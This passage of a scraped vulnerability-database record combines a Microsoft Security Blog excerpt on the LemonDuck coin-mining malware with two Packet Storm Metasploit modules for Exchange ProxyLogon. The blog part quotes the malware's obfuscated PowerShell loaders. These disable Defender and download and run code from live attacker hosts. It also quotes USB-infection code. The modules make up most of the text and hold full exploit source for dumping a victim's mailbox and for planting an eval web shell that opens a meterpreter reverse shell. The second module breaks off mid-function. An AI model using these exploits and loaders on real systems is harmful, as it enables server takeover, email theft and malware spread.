VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.\n * what's wrong with you?are you out of your mind!!!!!\n * are you out of your mind!!!!!what 's wrong with you?\n * good bye, keep in touch\n * can you help me to fix the file,i can't read it\n * file is brokened, i can't open it \n \nThe attachment used for these lures is one of three types: .doc, .js, or a .zip containing a .js file. Whatever the type, the file is named \u201creadme\u201d. Occasionally, all three types are present in the same email.\n\n\n\n_Figure 3. Sample email_\n\nWhile the JavaScript is detected by many security vendors, it might be classified with generic detection names. It could be valuable for organizations to sanitize JavaScript or VBScript executing or calling prompts (such as PowerShell) directly from mail downloads through solutions such as [custom detection rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide>).\n\nSince LemonDuck began operating, the .zip to .js file execution method is the most common. The JavaScript has replaced the scheduled task that LemonDuck previously used to kickstart the PowerShell script. This PowerShell script has looked very similar throughout 2020 and 2021, with minor changes depending on the version, indicating continued development. Below is a comparison of changes from the most recent iterations of the email-delivered downloads and those from April of 2020.\n\n \n\n**April 2020 PowerShell script** | **March 2021 PowerShell script** \n---|--- \n`var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden -c \\\"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\\\Microsoft\\\\Windows\\\\DiskCleanup\\\\SilentCleanup /I;Remove-ItemProperty -Path 'HKCU:\\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p.php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%computername%''+[Environment]::OSVersion.version.Majo \n//This File is broken.` | `var cmd =new ActiveXObject(\"WScript.Shell\");var cmdstr=\"cmd /c start /b notepad \"+WScript.ScriptFullName+\" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'z3r0.com/mail.jsp?js_0.7')\";cmd.run(cmdstr,0,1); \n//This File is broken.` \n \n \n\nAfter the emails are sent, the inbox is cleaned to remove traces of these mails. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\nOther common methods of infection include movement within the compromised environment, as well as through USB and connected drives. These processes are often kicked off automatically and have occurred consistently throughout the entirety of LemonDuck\u2019s operation.\n\nThese methods run as a series of C# scripts that gather available drives for infection. They also create a running list of drives that are already infected based on whether it finds the threat already installed. Once checked against the running list of infected drives, these scripts attempt to create a set of hidden files in the home directory, including a copy of _readme.js_. Any device that has been affected by the LemonDuck implants at any time could have had any number of drives attached to it that are compromised in this manner. This makes this behavior a possible entry vector for additional attacks.\n\n`DriveInfo[] drives = DriveInfo.GetDrives(); \nforeach (DriveInfo drive in drives) \n{ \nif (blacklist.Contains(drive.Name)) \n{ continue;} \nConsole.WriteLine(\"Detect drive:\"+drive.Name); \nif (IsSupported(drive)) \n{ \nif (!File.Exists(drive + home + inf_data)) \n{ \nConsole.WriteLine(\"Try to infect \"+drive.Name); \nif (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) \n{ \nblacklist.Add(drive.Name); \n} \n} \nelse { \nConsole.WriteLine(drive.Name+\" already infected!\"); \nblacklist.Add(drive.Name); \n} \n} \nelse{ \nblacklist.Add(drive.Name);`\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Microsoft 365 Defender has AI-powered industry-leading protections that can stop multi-component threats like LemonDuck across domains and across platforms. Microsoft 365 Defender for Office 365 detects the malicious emails sent by the LemonDuck botnet to deliver malware payloads as well as spread the bot loader. Microsoft Defender for Endpoint detects and blocks LemonDuck implants, payloads, and malicious activity on Linux and Windows.\n\nMore importantly, Microsoft 365 Defender provides rich investigation tools that can expose detections of LemonDuck activity, including attempts to compromise and gain a foothold on the network, so security operations teams can efficiently and confidently respond to and resolve these attacks. Microsoft 365 Defender correlates cross-platform, cross-domain signals to paint the end-to-end attack chain, allowing organizations to see the full impact of an attack. We also published a threat analytics article on this threat. Microsoft 365 Defender customers can use this report to get important technical details, guidance for investigation, consolidated incidents, and steps to mitigate this threat in particular and modern cyberattacks in general.\n\nIn Part 2 of this blog series, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general, automatic behavior as well as human-initialized behavior. We will also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks. **READ: [When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>).**\n\n \n\n_Microsoft 365 Defender Threat Intelligence Team_\n\nThe post [When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-22T16:00:57", "type": "mssecure", "title": "When coin miners evolve, Part 1: Exposing LemonDuck and LemonCat, modern mining malware infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-22T16:00:57", "id": "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "href": "https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-05-21T16:03:52", "description": "", "cvss3": {}, "published": "2021-05-21T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Collector", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-05-21T00:00:00", "id": "PACKETSTORM:162736", "href": "https://packetstormsecurity.com/files/162736/Microsoft-Exchange-ProxyLogon-Collector.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit) \n# Date: 2021-03-02 \n# Exploit Author: RAMELLA S\u00e9bastien \n# Vendor Homepage: https://microsoft.com \n# Version: This vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n# Tested on: Microsoft Windows 2012 R2 - Exchange 2016 \n \n## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n# begin auxiliary class \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon Collector', \n'Description' => %q{ \nThis module scan for a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication and impersonating as the \nadmin (CVE-2021-26855). \n \nBy chaining this bug with another post-auth arbitrary-file-write \nvulnerability to get code execution (CVE-2021-27065). \n \nAs a result, an unauthenticated attacker can execute arbitrary commands on \nMicrosoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module author (Zeop Entreprise) \n], \n'References' => [ \n['CVE', '2021-26855'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse'], \n['URL', 'http://aka.ms/exchangevulns'] \n], \n'DisclosureDate' => '2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'The email account what you want dump']), \nOptString.new('FOLDER', [true, 'The email folder what you want dump', 'inbox']), \nOptString.new('SERVER_NAME', [true, 'The name of secondary internal Exchange server targeted']) \n]) \n \nregister_advanced_options([ \nOptInt.new('MaxEntries', [false, 'Override the maximum number of object to dump', 512]) \n]) \nend \n \nXMLNS = { 't' => 'http://schemas.microsoft.com/exchange/services/2006/types' }.freeze \n \ndef grab_contacts \nresponse = send_xml(soap_findcontacts) \nxml = Nokogiri::XML.parse(response.body) \n \ndata = xml.xpath('//t:Contact', XMLNS) \nif data.empty? \nprint_status(' - the user has no contacts') \nelse \nwrite_loot(data.to_s) \nend \nend \n \ndef grab_emails(total_count) \n# get the emails list of the target folder. \nresponse = send_xml(soap_maillist(total_count)) \nxml = Nokogiri::XML.parse(response.body) \n \n# iteration to download the emails. \nxml.xpath('//t:ItemId', XMLNS).each do |item| \nprint_status(\" - download item: #{item.values[1]}\") \nresponse = send_xml(soap_download(item.values[0], item.values[1])) \nxml = Nokogiri::XML.parse(response.body) \n \nmessage = xml.at_xpath('//t:MimeContent', XMLNS).content \nwrite_loot(Rex::Text.decode_base64(message)) \nend \nend \n \ndef send_xml(data) \nuri = normalize_uri('ecp', 'temp.js') \n \nreceived = send_request_cgi( \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"X-BEResource=#{datastore['SERVER_NAME']}/EWS/Exchange.asmx?a=~3;\", \n'ctype' => 'text/xml; charset=utf-8', \n'data' => data \n) \nfail_with(Failure::Unknown, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_download(id, change_key) \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetItem> \n<m:ItemShape> \n<t:BaseShape>IdOnly</t:BaseShape> \n<t:IncludeMimeContent>true</t:IncludeMimeContent> \n</m:ItemShape> \n<m:ItemIds> \n<t:ItemId Id=\"#{id}\" ChangeKey=\"#{change_key}\" /> \n</m:ItemIds> \n</m:GetItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_findcontacts \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{datastore['MaxEntries']}\" Offset=\"0\" BasePoint=\"Beginning\" /> \n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='contacts'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_mailnum \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>Default</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"#{datastore['FOLDER']}\"> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef soap_maillist(max_entries) \n<<~SOAP \n<?xml version='1.0' encoding='utf-8'?> \n<soap:Envelope \nxmlns:soap='http://schemas.xmlsoap.org/soap/envelope/' \nxmlns:t='http://schemas.microsoft.com/exchange/services/2006/types' \nxmlns:m='http://schemas.microsoft.com/exchange/services/2006/messages' \nxmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'> \n<soap:Body> \n<m:FindItem Traversal='Shallow'> \n<m:ItemShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:ItemShape> \n<m:IndexedPageItemView MaxEntriesReturned=\"#{max_entries}\" Offset=\"0\" BasePoint=\"Beginning\" /> \n<m:ParentFolderIds> \n<t:DistinguishedFolderId Id='#{datastore['FOLDER']}'> \n<t:Mailbox> \n<t:EmailAddress>#{datastore['EMAIL']}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:ParentFolderIds> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \nSOAP \nend \n \ndef write_loot(data) \nloot_path = store_loot('', 'text/plain', datastore['RHOSTS'], data, '', '') \nprint_good(\" - file saved to #{loot_path}\") \nend \n \ndef run \n# get the informations about the targeted user account. \nresponse = send_xml(soap_mailnum) \nif response.body =~ /Success/ \nprint_status('Connection to the server is successful') \nprint_status(\" - selected account: #{datastore['EMAIL']}\\n\") \n \n# grab contacts. \nprint_status('Attempt to dump contacts list for this user') \ngrab_contacts \n \nprint_line \n \n# grab emails. \nprint_status('Attempt to dump emails for this user') \nxml = Nokogiri::XML.parse(response.body) \nfolder_id = xml.at_xpath('//t:FolderId', XMLNS).values \nprint_status(\" - selected folder: #{datastore['FOLDER']} (#{folder_id[0]})\") \n \ntotal_count = xml.at_xpath('//t:TotalCount', XMLNS).content \nprint_status(\" - number of email found: #{total_count}\") \n \nif total_count.to_i > datastore['MaxEntries'] \nprint_warning(\" - number of email recaluled due to max entries: #{datastore['MaxEntries']}\") \ntotal_count = datastore['MaxEntries'].to_s \nend \ngrab_emails(total_count) \nend \nend \n \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162736/msexchange-disclose.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T16:45:01", "description": "", "cvss3": {}, "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyLogon Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161938", "href": "https://packetstormsecurity.com/files/161938/Microsoft-Exchange-ProxyLogon-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyLogon RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker bypassing the authentication, impersonating as the \nadmin (CVE-2021-26855) and write arbitrary file (CVE-2021-27065) to get \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects (Exchange 2013 Versions < 15.00.1497.012, \nExchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, \nExchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010). \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Dicovery (Officially acknowledged by MSRC) \n'Jang (@testanull)', # Vulnerability analysis + PoC (https://twitter.com/testanull) \n'mekhalleh (RAMELLA S\u00e9bastien)', # Module author independent researcher (who listen to 'Le Comptoir Secu' and work at Zeop Entreprise) \n'print(\"\")', # https://www.o2oxy.cn/3169.html \n'lotusdll' # https://twitter.com/lotusdll/status/1371465073525362691 \n], \n'References' => [ \n['CVE', '2021-26855'], \n['CVE', '2021-27065'], \n['LOGO', 'https://proxylogon.com/images/logo.jpg'], \n['URL', 'https://proxylogon.com/'], \n['URL', 'http://aka.ms/exchangevulns'], \n['URL', 'https://www.praetorian.com/blog/reproducing-proxylogon-exploit'], \n[ \n'URL', \n'https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265' \n], \n['URL', 'https://www.o2oxy.cn/3169.html'], \n['URL', 'https://github.com/Zeop-CyberSec/proxylogon_writeup'] \n], \n'DisclosureDate' => '2021-03-02', \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'CheckModule' => 'auxiliary/scanner/http/exchange_proxylogon', \n'HttpClientTimeout' => 60, \n'RPORT' => 443, \n'SSL' => true, \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyLogon'] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptEnum.new('METHOD', [true, 'HTTP Method to use for the check', 'POST', ['GET', 'POST']]), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]) \n]) \n \nregister_advanced_options([ \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptInt.new('MaxWaitLoop', [true, 'Max counter loop to wait for OAB Virtual Dir reset', 30]), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef execute_command(cmd, _opts = {}) \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @random_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@random_inputname}=#{cmd}\" \n) \nend \n \ndef install_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \ninput_name = rand_text_alpha(4..8).to_s \nshell = \"http://o/#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{input_name}\\\"],\\\"unsafe\\\");}</script>\" \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nExternalUrl: shell.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => (exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \ninput_name \nend \n \ndef message(msg) \n\"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\" \nend \n \ndef patch_sid(sid) \nar = sid.to_s.split('-') \nif ar[-1] != '500' \nsid = \"#{ar[0..6].join('-')}-500\" \nend \n \nsid \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef random_ssrf_id \n# https://en.wikipedia.org/wiki/2,147,483,647 (lol) \n# max. 2147483647 \nrand(1941962752..2147483647) \nend \n \ndef request_autodiscover(server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n\"#{server_name}/autodiscover/autodiscover.xml?a=~#{random_ssrf_id}\", \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? \n \n[server, legacy_dn] \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(server_name, legacy_dn, server_id) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/mapi/emsmdb?MailboxId=#{server_id}&a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response.code == 200 \nsid_regex = /S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/ \n \nsid = response.body.match(sid_regex).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \ndef request_oab(server_name, sid, session, canary) \ndata = { \nfilter: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nSelectedView: '', \nSelectedVDirType: 'OAB' \n} \n}, \nsort: {} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=#{canary}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: session, \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \n \nif response.code == 200 \ndata = JSON.parse(response.body) \ndata['d']['Output'].each do |oab| \nif oab['Server'].downcase == server_name.downcase \nreturn [oab['Identity']['DisplayName'], oab['Identity']['RawIdentity']] \nend \nend \nend \n \n[] \nend \n \ndef request_proxylogon(server_name, sid) \ndata = \"<r at=\\\"Negotiate\\\" ln=\\\"#{datastore['EMAIL'].split('@')[0]}\\\"><s>#{sid}</s></r>\" \nsession_id = '' \ncanary = '' \n \nresponse = send_http( \n'POST', \n\"Admin@#{server_name}:444/ecp/proxyLogon.ecp?a=~#{random_ssrf_id}\", \ndata: data, \nctype: 'text/xml; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(sid), \n'msExchTargetMailbox' => patch_sid(sid) \n} \n) \nif response.code == 241 \nsession_id = response.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0] \ncanary = response.get_cookies.scan(/msExchEcpCanary=([\\w\\-_.]+);*/).flatten[0] # coin coin coin ... \nend \n \n[session_id, canary] \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_26855 \n# request for internal server name. \nresponse = send_http(datastore['METHOD'], \"localhost~#{random_ssrf_id}\") \nif response.code != 500 || !response.headers.to_s.include?('X-FEServer') \nfail_with(Failure::NotFound, 'No \\'X-FEServer\\' was found') \nend \n \nserver_name = response.headers['X-FEServer'] \nprint_status(\"Internal server name (#{server_name})\") \n \n# get informations by autodiscover request. \nprint_status(message('Sending autodiscover request')) \nserver_id, legacy_dn = request_autodiscover(server_name) \n \nprint_status(\"Server: #{server_id}\") \nprint_status(\"LegacyDN: #{legacy_dn}\") \n \n# get the user UID using mapi request. \nprint_status(message('Sending mapi request')) \nsid = request_mapi(server_name, legacy_dn, server_id) \nprint_status(\"SID: #{sid} (#{datastore['EMAIL']})\") \n \n# search oab \nsid, session, canary, oab_id = search_oab(server_name, sid) \n \n[server_name, sid, session, canary, oab_id] \nend \n \n# post-auth arbitrary file write. \ndef run_cve_2021_27065(session_info) \n# set external url (and set the payload). \nprint_status('Prepare the payload on the remote target') 